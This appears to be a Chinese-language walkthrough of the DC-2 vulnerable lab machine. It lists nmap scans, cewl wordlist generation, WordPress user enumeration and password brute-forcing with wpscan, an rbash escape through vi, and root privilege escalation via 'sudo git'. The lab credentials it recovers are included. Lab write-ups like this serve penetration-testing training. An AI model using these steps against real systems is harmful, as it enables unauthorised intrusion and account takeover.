DC-2 靶机
首先进行信息收集```
nmap -sS -A -p- 192.168.174.154 #识别目标主机服务,端口
-A 全面系统检测,启用脚本检测,扫描等 (更全面吧)
nmap -sS 192.168.174.0/24 扫描存活主机
nmap -sP 192.168.174.0/24 同上
(使用 -sP ,-p-参数进行扫描扫描出了一个7744端口,当时并未反映出是ssh,
所以扫描ip的话还是用nmap -sS -A -p- 比较全面)
#使用如上命令扫描后访问不了80端口 Did not follow redirect to http://dc-2/
发现dns还不能解析,故配置hosts文件(一开始看到没想到,要敏锐一点)
#kali重启网卡命令:systemctl restart networking
能够访问80端口看到flag,提示使用cewl
cewl-kali自带密码生成工具
#cewl -w dc2_passwords.txt http://dc-2 #生成字典
注(一开始我也是这么想使用御剑扫描出敏感目录,但方向没找到)
在确定是worlpress 使用wpscan工具扫描,枚举出用户
wpscan --url http://dc-2 --enumerate u
查看到有哪些用户
wpscan --url http://dc-2 -e u,其中-e表示枚举,u表示要扫描的目标:用户名
#进行密码爆破,爆破出 Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
wpscan --url http://dc-2 -P /root/桌面/dc2_passwords.txt -U /root/桌面/dc_2-user.txt
#使用dirb工具进行目录扫描,扫描出登陆窗口
#拿到flag2提示无其他漏洞,根据前面的7744猜测为ssh,进行连接
ssh tom@192.168.174.154 -p 7744 连接到tom,发现cd命令,ls命令等无法使用推测,发现是一个rbash也就是受到限制的bash,那么我们就要绕过bash
具体绕过:使用vi 3.txt(随便创建一个文件)
进入vi编辑器,输入:set shell=/bin/bash
再输入shell退出
执行命令 输入环境变量 export PATH=$PATH:/bin/
那么可以执行受到限制的命令,但并未获得root权限
使用sudo -l 用于显示当前用户可以用 sudo 执行那些命令,而不受权限限制
发现能使用git 搜索git提权 https://gtfobins.github.io/gtfobins/git/#sudo
执行命令
sudo git help config
!/bin/sh
获得root权限,拿到flag